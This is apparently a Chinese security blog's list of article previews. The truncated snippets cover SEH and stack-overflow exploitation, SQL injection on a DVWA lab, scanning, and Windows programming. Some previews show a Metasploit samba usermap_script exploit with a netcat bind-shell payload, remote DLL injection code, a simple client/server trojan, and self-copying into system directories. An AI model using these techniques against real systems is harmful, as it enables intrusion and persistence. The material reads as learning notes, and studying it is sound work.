hack
关注
分享
扫一扫
谛听-
线上幽灵
展开
-
利用 SEH 机制 Exploit it
有漏洞的源码:#include<windows.h>#include<string.h>#include<stdio.h>void test(char *str){ char buf[8]; strcpy(buf,str);}int main(){ FILE *fp; int i; char str[30000]; LoadLib...原创 2019-05-31 08:54:13 · 1317 阅读 · 0 评论 -
栈溢出覆盖返回地址
#include<stdio.h>#include<stdlib.h>int stack_over_flow(){ char Password[16] = { 0, }; gets(Password); return 0;}void readfile(){ FILE* fp; char FileStr[20] = { 0, }; pri...原创 2019-05-26 21:44:36 · 2363 阅读 · 1 评论 -
创建TCP代理
TCP代理可以将流量从一个主机转发给另一个主机,还可以起到类似Wireshark的作用,了解未知的协议,修改发送到应用的数据包。main 读入命令行,解析,调用server_loop监听连接请求,当一个新的请求到达时,交给proxy_handler处理。 proxy_handler: 每接收1 bit数据,发送到目标远程主机。持续从本地读取数据、处理、发送到远程主机,从远程读取数据、处理、原创 2018-01-16 22:01:21 · 2376 阅读 · 1 评论 -
取代netcat
main(): 解析命令,判断是监听,还是发送数据,如果监听,调用server_loop(),否则,从命令行读取输入,停止输入时输入Ctrl+D,并发送。server_loop(): 创建服务器,监听,接收到客户端连接后创建新线程,调用client_handler(client_socket)处理。client_handler(client_socket): 实现文件上传、命令执行和she原创 2018-01-14 17:57:23 · 523 阅读 · 0 评论 -
网络基础
TCP客户端import sockettarget_host = "www.baidu.com"target_port = 80# 建立一个socket# AF_INET:使用IPv4地址或主机名,SOCK_STREAM:使用TCPclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# 连接客户端clien原创 2018-01-13 19:39:21 · 238 阅读 · 0 评论 -
sql注入
启动xampp/opt/lampp/lampp start在搜狐浏览器中输入网址http://127.0.0.1/DVWA/select 在输入框中输入’ 出现以下提示错误: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for th原创 2017-12-27 22:30:12 · 278 阅读 · 0 评论 -
网络漏洞扫描
OpenVAS漏洞扫描器安装OpenVASapt-get install openvas安装配置OpenVASopenvas-setup接下来参考 https://www.cnblogs.com/zlslch/p/6872559.htmlMetasploit内部使用OpenVAS查找特定服务漏洞使用Nmap查找MS08-067漏洞nmap -P0 --script=smb-vuln-ms08-06原创 2017-12-24 16:37:19 · 741 阅读 · 0 评论 -
vbox kali安装linux-headers
打开sources.listvim /etc/apt/sources.list添加官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib更新apt-get updateapt-ge原创 2017-12-24 12:26:30 · 3486 阅读 · 0 评论 -
服务扫描与查点
查看所有可用的服务查点模块search name:_version常用的网络服务扫描tennet服务扫描 可为下一步网络嗅探或口令猜测做好准备这里写代码片原创 2017-12-24 12:07:43 · 556 阅读 · 0 评论 -
主机探测与端口扫描
检查主机是否活跃ping www.baidu.comMetasploit中的arp扫描search arp_sweepuse auxiliary/scanner/discovery/arp_sweepshow optionsset rhosts 10.10.10.0/25set threads 50run使用Nmap进行主机探测nmap <扫描选项><扫描目标>捕获网络中的存活主机情况nm原创 2017-12-23 11:52:51 · 989 阅读 · 0 评论 -
外围信息搜集
外围信息搜集whois域名注册信息查询whois testfire.net nslookup域名查询nslookupset type=A // 注意type后面不能有空格,对IP地址解析testfire.netexitset type=MX //查找邮件转发服务器dig域名查询dig @<DNS服务器> <待查询的域名>DNS服务器可通过whois原创 2017-12-23 08:42:32 · 2380 阅读 · 0 评论 -
Metasploit 攻击
service postgresql startmfsconsolesearch sambause multi/samba/usermap_scriptshow payloadsset payloads cmd/unix/bind_netcatshow optionsset rhost 10.10.10.254《Metasploit渗透魔鬼训练营》原创 2017-12-22 02:25:49 · 396 阅读 · 0 评论 -
msf 下 database not connect解决方法
http://blog.youkuaiyun.com/pyufftj/article/details/20617513转载 2017-12-22 01:30:18 · 1690 阅读 · 0 评论 -
常用汇编指令
常用汇编指令 一、数据传输指令 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH 把字压入堆栈. POP 把字弹出堆栈. PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压转载 2017-11-19 21:34:42 · 410 阅读 · 0 评论 -
c-->汇编
课程链接 https://www.ichunqiu.com/course/50571获取函数地址#include "windows.h"#include "stdio.h"void main(){ HINSTANCE LibHandle = LoadLibrary("Kernel32.dll"); printf("Kernel32.dll address = 0x%x \n",原创 2017-11-19 21:23:28 · 377 阅读 · 0 评论 -
一个简单的钩子
1、新建dll 名称为keyboardHook,选择”MFC AppWizard(dll)”, 继续选择”MFC 扩展DLL(使用共享MFC DLL) 2、keyboardHook.cpp// keyboardHook.cpp : Defines the initialization routines for the DLL.//#include "stdafx.h"#include原创 2016-08-01 21:35:14 · 1215 阅读 · 0 评论 -
运算符重载
#include "iostream"using namespace std;class CAdd{private: int m_Left;public: CAdd(int a) { m_Left = a; } CAdd &operator +(int a); void ShowIt() { cout <<原创 2016-06-20 12:32:22 · 273 阅读 · 0 评论 -
虚函数
#include "iostream"using namespace std;class Musician{public: void great(); //非虚函数 virtual void play(); //虚函数};void Musician::great(){ cout << "Musician says: hello" << endl;}void M原创 2016-06-19 20:57:09 · 363 阅读 · 0 评论 -
VS生成lib文件
1 2 3 4 5 编写代码,运行原创 2016-06-07 14:23:03 · 1149 阅读 · 0 评论 -
远程DLL注入、卸载
Dll注入//dwPid 为目标进程PID//szDllName 为要注入的DLL文件void CDllManageDlg::InjectDll(DWORD dwPid, CString szDllName){ if(dwPid == 0 || strlen(szDllName) == 0) return; HANDLE hProcess = OpenProces原创 2016-01-04 16:15:50 · 2103 阅读 · 2 评论 -
第一个Dll
简单的Dll#include "stdafx.h"//导出函数extern "C" __declspec(dllexport) VOID MsgBox(char *szMsg);VOID MsgBox(char *szMsg) { char szModuleName[MAX_PATH] = {0}; //获取当前进程已加载模块的文件的完整路径,该模块必须由当前进程加载原创 2015-12-29 16:30:36 · 433 阅读 · 0 评论 -
线程同步
#include "stdio.h"#include "Windows.h"int g_Num_One = 0;CRITICAL_SECTION g_cs;DWORD WINAPI ThreadProc(LPVOID lpParam){ int nTmp = 0; for(int i=0; i<10; i++) { EnterCriticalSecti原创 2015-12-28 16:48:55 · 342 阅读 · 0 评论 -
进程管理
创建进程示例:void CProcessManageDlg::OnButtonCreate() { // TODO: Add your control notification handler code here PROCESS_INFORMATION pi = {0}; STARTUPINFO si = {0}; si.cb = sizeof(STARTUPINFO)原创 2015-12-28 16:04:38 · 346 阅读 · 0 评论 -
服务相关编程
枚举服务:void CServerManageDlg::ShowServiceList(DWORD dwServiceType){ m_ServiceList.DeleteAllItems(); SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(NULL == hSCM) {原创 2015-12-26 19:29:08 · 371 阅读 · 0 评论 -
注册表项管理
ClistCtrl初始化 void CRegManageDlg::InitRunList(){ m_RunList.SetExtendedStyle(m_RunList.GetExtendedStyle() | LVS_EX_GRIDLINES //有网格线原创 2015-12-25 10:53:02 · 394 阅读 · 0 评论 -
AutoRun 免疫程序的编写
在OnInitDialog()中添加:char szDriverString[MAXBYTE] = {0}; char *pTmp = NULL; SetDlgItemText(IDC_COMBO_DRIVER, _T("请选择欲免疫的盘符...")); GetLogicalDriveStrings(MAXBYTE, szDriverString); pTmp = szDr原创 2015-12-25 09:09:56 · 562 阅读 · 0 评论 -
实现一个c/s模式的简单木马
服务器:#include "iostream"#include "winsock2.h"#include "string.h"#pragma comment (lib, "ws2_32")#pragma comment(lib, "Winmm.lib ") using namespace std;#define HELPMSG "help - Show help menu \n"\原创 2015-12-24 22:52:19 · 835 阅读 · 7 评论 -
基于UDP协议的”hello world“
服务器端#include "iostream"#include "winsock2.h"#pragma comment (lib, "ws2_32")using namespace std;int main(){ WSADATA wsaData; WSAStartup(MAKEWORD(2, 2), &wsaData); //初始化ws2_32.dll动态库连接 SOC原创 2015-12-19 19:06:49 · 580 阅读 · 0 评论 -
基于TCP协议的”hello world“
服务器端#include "iostream"#include "winsock2.h"#pragma comment (lib, "ws2_32")using namespace std;int main(){ WSADATA wsaData; WSAStartup(MAKEWORD(2, 2), &wsaData); //初始化ws2_32.dll动态库连接 SOC原创 2015-12-19 17:39:19 · 596 阅读 · 0 评论 -
复制自身程序到Windows目录和系统目录下
#include "iostream"#include "windows.h"using namespace std;/* GetModuleFileName( //获得自身程序所在路径 HMODULE NULL, //在获得自身程序时使用NULL LPTSTR lpFilename, //保存程序自身所在路径 DWORD n原创 2015-12-19 16:10:55 · 1293 阅读 · 0 评论 -
获得系统相关信息
准备工作: #include "iostream"#include "windows.h"using namespace std;/* typedef struct _OSVERSIONINFO{ DWORD dwOSVersionInfoSize; //结构体大小 DWORD dwMajerVersion; //主版本号 DWO原创 2015-12-19 13:47:58 · 618 阅读 · 0 评论 -
利用流式套接字传输数据文件
服务器端: 1>建立一个基于对话框的应用程序StreamSocketServer 2>设计界面,将“确定”按钮的标题改为“启动” 3>双击“启动按钮”,添加以下代码,初始化网络,启动服务器监听void CStreamSocketServerDlg::OnOK() { // TODO: Add extra validation here WSADATA wsaData;原创 2015-12-18 21:39:28 · 4986 阅读 · 2 评论 -
vc网络编程准备
1、WINSOCK.h头文件 #include "WINSOCK.h"2、WSOCK32.lib原创 2015-12-17 11:25:08 · 327 阅读 · 0 评论